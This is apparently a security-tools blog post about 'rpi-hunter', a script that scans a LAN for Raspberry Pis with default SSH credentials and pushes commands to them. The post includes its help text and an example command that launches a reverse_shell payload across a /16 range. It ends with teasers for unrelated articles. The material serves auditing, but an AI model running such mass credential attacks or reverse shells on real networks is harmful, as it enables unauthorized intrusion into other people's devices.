rpi hunter is useful when there are multiple Raspberry Pi’s on your LAN with default or known credentials, in order to automate sending commands/payloads to them.
Also Read – VSHG : A Standalone Addon for GnuPG
Installation
Usage
usage: rpi-hunter.py [-h] [–list] [–no-scan] [-r IP_RANGE] [-f IP_LIST]
[-c CREDS] [–payload PAYLOAD] [-H HOST] [-P PORT]
[–safe] [-q]
optional arguments:
-h, –help show this help message and exit
–list List available payloads
–no-scan Disable ARP scanning
-r IP_RANGE IP range to scan
-f IP_LIST IP list to use (Default ./scan/RPI_list)
-u UNAME Username to use when ssh’ing
-c CREDS Password to use when ssh’ing
–payload PAYLOAD (Name of, or raw) Payload [ex. reverse_shell or ‘whoami’]
-H HOST (If using reverse_shell payload) Host for reverse shell
-P PORT (If using reverse_shell payload) Port for reverse shell
–safe Print sshpass command, but don’t execute it
-q Don’t print banner
Example usage: ./rpi-hunter.py -r 192.168.0.0/16 –payload reverse_shell -H 127.0.0.1 -P 1337
Run ./rpi-hunter.py –list to see avalible payloads.
Payloads can be specified by the payload name from –list or as raw input
ex. –payload reverse_shell or –payload [your cli command here]
Disclaimer
The standard internet fun disclaimer applies. Don’t commit crimes, be responsible.I am in no way responsible for anything and everything you do with rpi-hunter.
Pystinger is a Python-based tool that enables SOCKS4 proxying and port mapping through webshells. It…
Introduction When it comes to cybersecurity, speed and privacy are critical. Public vulnerability databases like…
Introduction When it comes to cybersecurity, speed and privacy are critical. Public vulnerability databases like…
If you are working with Linux or writing bash scripts, one of the most common…
What is a bash case statement? A bash case statement is a way to control…
Why Do We Check Files in Bash? When writing a Bash script, you often work…